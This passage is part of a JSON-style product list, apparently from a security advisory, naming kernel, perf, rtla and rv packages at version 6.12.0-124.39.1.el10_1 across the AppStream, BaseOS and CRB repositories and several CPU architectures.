"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
